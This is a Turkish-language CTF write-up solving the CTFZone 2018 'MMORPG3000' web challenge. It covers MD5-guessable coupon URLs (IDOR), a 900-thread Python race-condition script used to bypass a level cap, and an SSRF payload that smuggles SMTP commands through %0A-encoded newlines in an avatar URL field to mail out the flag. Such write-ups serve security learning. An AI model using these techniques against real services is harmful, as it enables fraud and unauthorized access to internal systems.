# MMORPG3000  
```  
Here is a new generation mmorpg game, where you can beat your friends, just
finished crowdfunding campaign and available on your PC starting today. It's a
bit buggy, but you know...  
I heard that developers of this game are really greedy.

http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/game/battle/competitors/  
```

Linke gittik, üye olduktan sonra karşımıza böyle bir sayfa çıktı.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/1.png)

Bedava kuponumuzu almak üzere __donate__ sayfasına gittik.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/2.png)

Kuponumuzu girdik ve karşımıza böyle bir resim çıktı

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/3.png)

Resimin __URL__'si şu şekildeydi;

```  
http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/storage/img/coupon_aa2a77371374094fe9e0bc1de3f94ed9.png  
```

__coupon_aa2a77371374094fe9e0bc1de3f94ed9__ kısmındaki hash kısmı userid'in
hash hali olduğunu fark ettik. Başka sayı hashleyip denedik.

__1682__'in __MD5__'ini aldık ve denedik __6a81681a7af700c6385d36577ebec359__

```  
http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/storage/img/coupon_6a81681a7af700c6385d36577ebec359.png  
```

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/4.png)

__b92ee610-4289__ çıktı ve kuponu denedik 1 balance verdi. bir kaç kupoon daha
denedik ve 1349 cuponumuz oldu.

Para ile level atlattik fakat level 30'un üstüne para ile geçilmediğini
öğrendik. Belki __Race Condition__ vardır diye çok thread ile aynı isteği
başka bir hesapla denedik

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/5.png)

```python  
import requests  
import threading

threadArray = []

class expClass(threading.Thread):  
burp0_url = "http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one:80/donate/lvlup"  
burp0_cookies = {"session": "eyJ1aWQiOjgyOX0.DjeKvA.qA-
vNIHjDFSPyuDwArZyGMQD984"}  
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:61.0) Gecko/20100101 Firefox/61.0", "Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-
Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer":
"http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/user/info", "DNT": "1",
"Connection": "close", "Upgrade-Insecure-Requests": "1"}  
  
def __init__(self, numMain):  
super(expClass, self).__init__()

def ham(self):  
requests.get(self.burp0_url, headers=self.burp0_headers,
cookies=self.burp0_cookies)

  
def run(self):  
self.ham()  

thr = 900

for i in range(0, thr ):  
threadcan = expClass(i)  
threadArray.append(threadcan)  
  
for i in range(0, thr):  
threadArray[i].start()  
print G + "thread girdi => " + str(i)  
for i in range(0, thr):  
threadArray[i].join()  
print R + "thread cikti => " + str(i)  
```

Ve 30'uncu leveli geçtik

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/6.png)

30'uncu leveli geçtiğimizden dolayı __Avatar__ ekleme özelliği açıldı.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/7.png)

Upload olayında birşey yoktu. __SSRF__'tir diye düşündük. __127.0.0.1__ ve
__localhost__ engelliydi bu yüzden __SSRF__ olduğuna emin olduk. __0.0.0.0__
adresini denedik ve yediğini fark ettik. Port taramaya başladık.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/8.png)

__25__'ci port yani __SMTP__ portu açıktı. __Host__'u manipüle ederek
__SMTP__'yi kullanmayı denedik.

```smtp  
Host: [0.0.0.0  
helo 1v3m  
mail from:<[email protected]>  
rcpt to:<root>  
data  
subject: give me flag

1v3m  
.  
]:25  
```

Yeni satır ayıracı __SMTP__'de delimiter olduğu için her satırın sonuna yeni
satırın __URL Encoded__ hali olan __%0A__'yı ekledik ve son payloadımızın son
hali

```url  
[0.0.0.0%0ahelo 1v3m%0amail from:<[email protected]>%0arcpt
to:<root>%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25  
```

__Request__'imizin son hali şöyle oldu:

```http  
POST /user/avatar HTTP/1.1  
Host: web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/user/avatar  
Content-Type: multipart/form-data;
boundary=---------------------------4693211868403427471435307016  
Content-Length: 581  
Cookie: session=eyJ1aWQiOjgyN30.DjaSgA.ylhJXkstamQ7GahYWvUypKpvDQc  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1

\-----------------------------4693211868403427471435307016  
Content-Disposition: form-data; name="avatar"; filename=""  
Content-Type: application/octet-stream

\-----------------------------4693211868403427471435307016  
Content-Disposition: form-data; name="url"

https://[0.0.0.0%0ahelo 1v3m%0amail from:<[email protected]>%0arcpt
to:<root>%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25  
\-----------------------------4693211868403427471435307016  
Content-Disposition: form-data; name="action"

save  
\-----------------------------4693211868403427471435307016--

```

Flag mailimize geldi

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/9.png)

ve flag

```  
ctfzone{1640392aaf27597150c97e04a99a6f08}  
```

Original writeup
(https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/).